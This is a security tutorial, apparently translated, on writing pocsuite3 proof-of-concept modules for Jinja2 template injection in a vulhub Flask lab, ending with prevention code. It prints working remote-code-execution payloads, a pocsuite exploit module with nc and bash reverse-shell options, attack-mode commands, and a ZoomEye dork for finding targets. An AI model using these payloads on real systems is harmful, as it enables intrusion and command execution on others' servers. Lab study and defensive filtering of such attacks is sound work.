Installing pocsuite

  1. Install pocsuite3

pip3 install pocsuite3

  2. Install the dependency packages
pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/
Contents of requirements.txt:
requests == 2.22.0
PySocks == 1.7.1
requests-toolbelt == 0.9.1
urllib3 == 1.25.6
  • When running pocsuite, the --verify option calls the POC's _verify method to check whether the target is vulnerable;
  • the --attack option calls the _attack method to launch an attack against the target.
python pocsuite.py -r pocs/test.py -u target-url --verify                 # -r: path of the POC script
python pocsuite.py -r pocs/test.py -f 1.txt --verify                      # -f: file containing target URLs
python pocsuite.py -r pocs/* -u target-url --verify                       # test with every POC in the directory
python pocsuite.py -r pocs/test.py -u target-url --verify --threads 10
python cli.py --dork 'port:6379' --vul-keyword 'redis' --max-page <n>     # find targets through the ZoomEye search engine
python pocsuite.py -r pocs/test.py -u target-url --attack                 # attack mode
python pocsuite.py -r pocs/test.py -u target-url --shell                  # interactive shell mode
python pocsuite.py -r pocs/test.py -u target-url --attack --command "whoami"

Introduction to Flask

Flask is a lightweight web application framework written in Python; its template engine is Jinja2. Flask is a micro-framework, which is both a strength and a weakness: the framework is light and has few dependencies to keep updated, so it is easier to concentrate on security vulnerabilities, but functionality has to be added through plugins that grow the dependency list. One of Flask's dependencies is the Jinja2 template engine, the component behind template injection vulnerabilities; Jinja2 is a template language for Python.

  1. Environment setup
git clone https://github.com/vulhub/vulhub.git
cd vulhub/flask/ssti
docker-compose build
docker-compose up -d

2. Code analysis

docker ps -a
docker exec -it 1e8500123856 /bin/bash

from flask import Flask, request
from jinja2 import Template

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'guest')   # value taken straight from the query string
    t = Template("Hello " + name)              # concatenated into the template source itself
    return t.render()

if __name__ == "__main__":
    app.run()

As can be seen, name is passed into the template on the server without any filtering.

Exploit code and method

payload:

{% for c in [].__class__.__base__.__subclasses__() %}
  {% if c.__name__ == 'catch_warnings' %}
    {% for b in c.__init__.__globals__.values() %}
      {% if b.__class__ == {}.__class__ %}
        {% if 'eval' in b.keys() %}
          {{ b['eval']('__import__("os").popen("id").read()') }}
        {% endif %}
      {% endif %}
    {% endfor %}
  {% endif %}
{% endfor %}

[screenshot] The payload executes successfully, and the file contents can be viewed.

Writing the POC

  1. POC verification module
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):  # the POC class DemoPOC inherits from POCBase
    vulID = '1.1'
    version = '1.1'
    author = ['1']
    vulDate = '1.1'
    createDate = '2020/10/10'
    updateDate = '1.1'
    references = ['flask']
    name = 'flask-poc'
    appPowerLink = 'flask'
    appName = 'flask'
    appVersion = 'flask'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''flask'''
    # samples = ['96.234.71.117:80']
    # category = POC_CATEGORY.EXPLOITS.REMOTE

    def _verify(self):  # verification function
        result = {}     # result dict handed back to the framework
        path = "?name="
        url = self.url + path
        payload = "{{3*3}}"
        try:
            res = requests.get(url=url + payload)
            # loose match: any "9" in the page counts, so expect false positives
            if res.status_code == 200 and "9" in res.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            pass
        return self.parse_output(result)

    def _attack(self):  # note: if the POC has no attack mode, just return self._verify() here instead of writing a real _attack()
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)

Execution result: [screenshot]

  2. exp execution module
    When a Jinja2 template accesses Python's built-in variables and calls them, the following Python attributes are used.
__bases__: returns, as a tuple, the classes a class directly inherits from.
__mro__: returns the inheritance chain as a tuple.
__class__: returns the class an object belongs to.
__globals__: returns, as a dict, all variables in the namespace of the module the function is defined in.
__subclasses__(): returns the subclasses of a class as a list.
__builtins__: the built-in functions.

Some functions in Python can be run directly, such as int() and list(); they can all be found in __builtins__, and dir(__builtins__) lists them. Building on this Python feature, the penetration-testing idea is to use __builtins__ to reach eval, as shown below:

for c in ().__class__.__bases__[0].__subclasses__():
    if c.__name__ == '_IterationGuard':
        c.__init__.__globals__['__builtins__']['eval']("__import__('os').system('whoami')")

Then convert it into Jinja2 syntax. Jinja2's syntax resembles Python's, but each statement has to be wrapped in {% %} (and each expression whose value is output in {{ }}). The converted code is shown below; in the actual request it is sent URL-encoded (spaces as %20, quotes as %27):

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == '_IterationGuard' %}{{ c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()") }}{% endif %}{% endfor %}

from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY


class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1']
    vulDate = '1.1'
    createDate = '1.1'
    updateDate = '1.1'
    references = ['1.1']
    name = 'flask-exp'
    appPowerLink = 'flask'
    appName = 'flask'
    appVersion = 'flask'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = ''''''
    # samples = ['96.234.71.117:80']
    # category = POC_CATEGORY.EXPLOITS.REMOTE

    def _options(self):  # declare the "command" option so it can be set with --command
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o

    def _verify(self):  # this exp has no separate verification logic
        output = Output(self)
        result = {}
        return output

    def _attack(self):
        # example target: http://192.168.0.103:8000/?name={{2*2}}
        result = {}
        path = "?name="
        url = self.url + path
        cmd = self.get_option("command")
        # payload: URL-encoded form of the Jinja2 payload above; it walks the subclasses
        # of object to reach the built-in eval and runs cmd through os.popen.
        # (The value is appended directly after "?name=", so it carries no "name=" prefix.)
        payload = (
            '%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A'
            '%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A'
            '%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A'
            '%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A'
            '%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A'
            '%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("' + cmd + '").read()%27)%20%7D%7D%0A'
            '%20%20%20%20%7B%25%20endif%20%25%7D%0A'
            '%20%20%7B%25%20endif%20%25%7D%0A'
            '%20%20%7B%25%20endfor%20%25%7D%0A'
            '%7B%25%20endif%20%25%7D%0A'
            '%7B%25%20endfor%20%25%7D'
        )
        try:
            res = requests.get(url=url + payload)
            t = res.text
            t = t.replace('\n', '').replace('\r', '')
            print(t)  # the rendered page contains the command output
            t = t.replace(" ", "")
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Name'] = payload
        except Exception as e:
            pass
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)

Execution result: [screenshot]
The interactive shell mode (--shell) can also be used: [screenshot]

Prevention

The Flask vulnerability exploits a feature of the framework: in Flask, the content inside "{{}}" is executed as code, so the corresponding defence needs to filter "{{}}" and forbid these symbols from being passed in as parameters.
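The advice above in code, as an added example (not the book's, pocsuite3's or vulhub's code): the vulnerable concatenation beside the root-cause fix, which passes the request value to Jinja2 as a template variable, plus the delimiter filter applied to URL-decoded query strings so that the %7B%25-encoded form the exp module sends is caught as well. It assumes Jinja2 is installed for the two render functions; the detector needs only the standard library.

```python
import re
from urllib.parse import urlsplit, parse_qsl

def render_vulnerable(name):
    # Same shape as the vulhub app: the request value is concatenated into the
    # template source, so Jinja2 parses any {{ }} / {% %} inside it as code.
    from jinja2 import Template  # assumed installed (Flask depends on it)
    return Template("Hello " + name).render()

def render_fixed(name):
    # Fix: the template source is a constant and the request value is passed as
    # a context variable, so "{{7*7}}" is echoed as text instead of evaluated.
    from jinja2 import Template
    return Template("Hello {{ name }}").render(name=name)

# Jinja2 delimiters: the filter the text recommends, plus the closing forms.
TEMPLATE_DELIMS = re.compile(r"\{\{|\{%|\{#|%\}|\}\}")

def has_template_syntax(value):
    """True if a decoded parameter value contains Jinja2 delimiters."""
    return TEMPLATE_DELIMS.search(value) is not None

def flag_request(request_target):
    """Names of query parameters that carry template syntax, for use in a
    request filter or when reviewing access logs. parse_qsl URL-decodes the
    values, so the %7B%25 encoding used by the exp module is caught too."""
    query = urlsplit(request_target).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True)
            if has_template_syntax(v)]

# Constructed sample request targets (not captured traffic): a normal request,
# the {{3*3}} probe the POC sends, and the encoded start of the exp payload.
SAMPLE_TARGETS = [
    "/?name=guest",
    "/?name=%7B%7B3*3%7D%7D",
    "/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D",
]

def scan(targets=SAMPLE_TARGETS):
    """Map each request target to its flagged parameters; an empty list means clean."""
    return {t: flag_request(t) for t in targets}

if __name__ == "__main__":
    for target, params in scan().items():
        print("SUSPECT" if params else "ok", target, params)
```

The filter is defence in depth and a useful log-review signal; the actual fix is render_fixed, since the delimiters only matter when user input becomes part of the template source.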
